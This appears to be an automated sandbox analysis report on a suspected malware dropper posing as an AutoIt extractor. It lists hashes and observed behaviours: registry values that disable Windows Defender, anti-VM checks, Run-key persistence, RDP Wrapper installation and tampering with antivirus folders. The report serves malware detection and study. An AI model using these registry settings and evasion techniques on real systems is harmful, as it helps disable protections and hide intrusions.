Resubmissions
21-09-2024 16:31
240921-t1qvhasdmk 612-08-2024 10:22
240812-mebp5awhkn 625-07-2024 11:21
240725-nge11ayeqg 713-07-2024 10:18
240713-mcdfyaxajp 911-07-2024 20:03
240711-ysrjaa1hnj 708-06-2024 18:41
240608-xb31baee6w 325-05-2024 19:34
240525-yaastaff2v 823-05-2024 17:58
240523-wj9mdsbb2y 9Analysis
-
max time kernel
413s -
max time network
419s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 19:38
Static task
static1
General
-
Target
AutoIt-Extractor-net40-x64.exe
-
Size
1.2MB
-
MD5
205792ce0da5273baffa6aa5b87d3a88
-
SHA1
50439afe5c2bd328f68206d06d6c31190b3946c6
-
SHA256
d82d49e9ad153ef84670c1d0bde5f36b540d32fa037cca6127ce9e4e366b7403
-
SHA512
186f2fac650ee02683c689b0c04867a30330a5475475b106a2aaaedc5e2fa3c9325cf07a2c5321044f5aed1502d729d1d9537ac57bf7733cc228c44ceaba7821
-
SSDEEP
24576:pcdWeAKpCklFpaQ3vGvW68WxOFxT6YP7KPU48YNL8SsbJDeAKpCZG:QFAcdFpa068WxOFxT6YP7KPU48YNVsbu
Malware Config
Signatures
-
Processes:
Crack.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Crack.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Crack.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Crack.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Crack.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Crack.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Crack.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" Crack.exe -
Processes:
Crack.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications Crack.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Crack.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
Processes:
unsecapp.exeunsecapp.exeSetup.exeCrack.exeupdate.exeIP.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unsecapp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unsecapp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Crack.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ update.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IP.exe -
Drops file in Drivers directory 1 IoCs
Processes:
update.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts update.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 1708 netsh.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Setup.exeunsecapp.exeunsecapp.exeCrack.exeupdate.exeIP.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unsecapp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Crack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Crack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IP.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
install.exeupdate.exesvchost.exesmss.exewinserv.exewinserv.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation install.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation update.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation smss.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 14 IoCs
Processes:
SoftwareInstall.exeinstall.exeCrack.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exeRDPWinst.exeunsecapp.exeunsecapp.exewinserv.exepid Process 6360 SoftwareInstall.exe 6428 install.exe 6576 Crack.exe 6624 update.exe 5132 win.exe 7136 svchost.exe 5676 IP.exe 5484 smss.exe 4600 winserv.exe 5172 winserv.exe 5348 RDPWinst.exe 440 unsecapp.exe 7040 unsecapp.exe 6664 winserv.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid Process 5372 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid Process 6196 icacls.exe 1764 icacls.exe 3908 icacls.exe 7012 icacls.exe 3092 icacls.exe 6548 icacls.exe 3992 icacls.exe 5188 icacls.exe 5164 icacls.exe 6024 icacls.exe 5844 icacls.exe 6092 icacls.exe 5656 icacls.exe 4340 icacls.exe 1844 icacls.exe 6472 icacls.exe 5676 icacls.exe 4860 icacls.exe 5116 icacls.exe 6612 icacls.exe 6076 icacls.exe 6676 icacls.exe 724 icacls.exe 548 icacls.exe 5440 icacls.exe 3520 icacls.exe 5376 icacls.exe 6020 icacls.exe 4964 icacls.exe 5032 icacls.exe 4848 icacls.exe 6044 icacls.exe 5464 icacls.exe 1964 icacls.exe 1544 icacls.exe 6396 icacls.exe 852 icacls.exe 5876 icacls.exe 5508 icacls.exe 3792 icacls.exe 3400 icacls.exe 5976 icacls.exe 5044 icacls.exe 5780 icacls.exe 6344 icacls.exe 4904 icacls.exe 6728 icacls.exe 4612 icacls.exe 6816 icacls.exe 3696 icacls.exe 1216 icacls.exe 6864 icacls.exe 6572 icacls.exe 1088 icacls.exe 5416 icacls.exe 5932 icacls.exe 5272 icacls.exe 6076 icacls.exe 7036 icacls.exe 6232 icacls.exe 4232 icacls.exe 5504 icacls.exe 6508 icacls.exe 7120 icacls.exe -
Processes:
resource yara_rule behavioral1/memory/6292-2480-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2484-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2483-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2481-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2482-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2485-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2486-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2487-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2497-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2505-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/files/0x000300000001eb2d-2508.dat themida behavioral1/memory/6576-2523-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2527-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2530-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2529-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2528-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2531-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2532-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6576-2533-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6292-2535-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6292-2538-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6576-2537-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp themida behavioral1/memory/6624-2540-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2541-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2544-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6624-2545-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6624-2546-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6624-2547-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6624-2548-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6624-2550-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2551-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2553-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2554-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2556-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2557-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2567-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2580-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2584-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2594-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/files/0x0008000000023948-2601.dat themida behavioral1/memory/6624-2625-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/5676-2633-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/5676-2632-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/5676-2634-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/5676-2635-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/5676-2636-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/5676-2637-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/5676-2638-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/memory/6292-2641-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2643-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/5676-2644-0x00007FF708590000-0x00007FF709FCE000-memory.dmp themida behavioral1/files/0x000700000002396a-2677.dat themida behavioral1/memory/6292-2681-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida behavioral1/memory/6624-2683-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp themida behavioral1/memory/6292-2746-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
IP.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" IP.exe -
Processes:
unsecapp.exeunsecapp.exeCrack.exeupdate.exeIP.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA unsecapp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA unsecapp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Crack.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IP.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 160 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 46 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/memory/6292-2484-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2483-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2482-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2485-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2486-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2487-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2497-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2505-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6576-2530-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6576-2529-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6576-2528-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6576-2531-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6576-2532-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6576-2533-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6292-2535-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6292-2538-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6576-2537-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp autoit_exe behavioral1/memory/6292-2541-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2545-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6624-2546-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6624-2547-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6624-2548-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6624-2550-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6292-2551-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2553-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6292-2554-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2556-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6292-2557-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2567-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6292-2580-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2584-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6292-2594-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/files/0x0009000000023945-2610.dat autoit_exe behavioral1/memory/6624-2625-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/5676-2633-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/5676-2634-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/5676-2635-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/5676-2636-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/5676-2637-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/5676-2638-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/6292-2641-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2643-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/5676-2644-0x00007FF708590000-0x00007FF709FCE000-memory.dmp autoit_exe behavioral1/memory/6292-2681-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe behavioral1/memory/6624-2683-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp autoit_exe behavioral1/memory/6292-2746-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp autoit_exe -
Drops file in System32 directory 3 IoCs
Processes:
RDPWinst.exeIP.exedescription ioc Process File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe File created C:\Windows\SysWOW64\unsecapp.exe IP.exe File opened for modification C:\Windows\SysWOW64\unsecapp.exe IP.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
Setup.exeCrack.exeupdate.exeIP.exeunsecapp.exeunsecapp.exepid Process 6292 Setup.exe 6576 Crack.exe 6624 update.exe 5676 IP.exe 440 unsecapp.exe 7040 unsecapp.exe -
Drops file in Program Files directory 52 IoCs
Processes:
update.exesmss.exeRDPWinst.exedescription ioc Process File opened for modification C:\Program Files\ESET update.exe File opened for modification C:\Program Files\Transmission update.exe File opened for modification C:\Program Files\Common Files\AV update.exe File opened for modification C:\Program Files\Ravantivirus update.exe File opened for modification C:\Program Files\COMODO update.exe File opened for modification C:\Program Files\AVG update.exe File opened for modification C:\Program Files\HitmanPro update.exe File opened for modification C:\Program Files\Bitdefender Agent update.exe File opened for modification C:\Program Files\EnigmaSoft update.exe File opened for modification C:\Program Files\ByteFence update.exe File opened for modification C:\Program Files\AVAST Software update.exe File opened for modification C:\Program Files\CPUID\HWMonitor update.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification C:\Program Files (x86)\AVAST Software update.exe File opened for modification C:\Program Files (x86)\AVG update.exe File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files (x86)\SpyHunter update.exe File opened for modification C:\Program Files (x86)\Panda Security update.exe File opened for modification C:\Program Files (x86)\MSI\MSI Center update.exe File opened for modification C:\Program Files\QuickCPU update.exe File opened for modification C:\Program Files\Kaspersky Lab update.exe File opened for modification C:\Program Files\DrWeb update.exe File opened for modification C:\Program Files\Rainmeter update.exe File opened for modification C:\Program Files\Process Lasso update.exe File opened for modification C:\Program Files (x86)\Microsoft JDX update.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus update.exe File opened for modification C:\Program Files\Loaris Trojan Remover update.exe File opened for modification C:\Program Files (x86)\SpeedFan update.exe File opened for modification C:\Program Files (x86)\GPU Temp update.exe File created C:\Program Files\Common Files\System\iediagcmd.exe update.exe File opened for modification C:\Program Files (x86)\Moo0 update.exe File opened for modification C:\Program Files\SpyHunter update.exe File opened for modification C:\Program Files (x86)\Cezurity update.exe File opened for modification C:\Program Files\NETGATE update.exe File opened for modification C:\Program Files\ReasonLabs update.exe File opened for modification C:\Program Files\Common Files\Doctor Web update.exe File opened for modification C:\Program Files (x86)\IObit update.exe File opened for modification C:\Program Files\Common Files\McAfee update.exe File opened for modification C:\Program Files\Cezurity update.exe File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare update.exe File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter update.exe File opened for modification C:\Program Files\RogueKiller update.exe File opened for modification C:\Program Files\Enigma Software Group update.exe File opened for modification C:\Program Files\SUPERAntiSpyware update.exe File opened for modification C:\Program Files (x86)\Wise update.exe File opened for modification C:\Program Files (x86)\360 update.exe File opened for modification C:\Program Files\Malwarebytes update.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab update.exe File opened for modification C:\Program Files (x86)\Transmission update.exe File opened for modification C:\Program Files\Process Hacker 2 update.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exepid Process 6332 sc.exe 5792 sc.exe 6756 sc.exe 6196 sc.exe 6984 sc.exe 5180 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
smss.exefirefox.exefirefox.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 6732 schtasks.exe 1812 schtasks.exe 5388 schtasks.exe 5340 schtasks.exe 1572 schtasks.exe 6936 schtasks.exe 5608 schtasks.exe 6644 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid Process 5560 timeout.exe 564 timeout.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
SoftwareInstall.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Control Panel\International SoftwareInstall.exe -
Modifies registry class 4 IoCs
Processes:
firefox.exesmss.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\MIME\Database smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe -
NTFS ADS 4 IoCs
Processes:
IP.exesmss.exefirefox.exedescription ioc Process File opened for modification C:\ProgramData\Setup\winmgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe File opened for modification C:\ProgramData\Setup\WinMgmts:\ IP.exe File created C:\Users\Admin\Downloads\john.zip:Zone.Identifier firefox.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup.exeupdate.exewinserv.exeIP.exepid Process 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6292 Setup.exe 6624 update.exe 6624 update.exe 6624 update.exe 6624 update.exe 6624 update.exe 6624 update.exe 6624 update.exe 6624 update.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 5676 IP.exe 5676 IP.exe 5676 IP.exe 5676 IP.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
unsecapp.exepid Process 440 unsecapp.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 664 -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
firefox.exewinserv.exewinserv.exeRDPWinst.exesvchost.exedescription pid Process Token: SeDebugPrivilege 2940 firefox.exe Token: SeDebugPrivilege 2940 firefox.exe Token: SeDebugPrivilege 2940 firefox.exe Token: SeDebugPrivilege 2940 firefox.exe Token: SeDebugPrivilege 2940 firefox.exe Token: SeDebugPrivilege 2940 firefox.exe Token: SeDebugPrivilege 4600 winserv.exe Token: SeTakeOwnershipPrivilege 5172 winserv.exe Token: SeTcbPrivilege 5172 winserv.exe Token: SeTcbPrivilege 5172 winserv.exe Token: SeDebugPrivilege 5348 RDPWinst.exe Token: SeAuditPrivilege 5372 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
firefox.exepid Process 2940 firefox.exe 2940 firefox.exe 2940 firefox.exe 2940 firefox.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
firefox.exepid Process 2940 firefox.exe 2940 firefox.exe 2940 firefox.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
Processes:
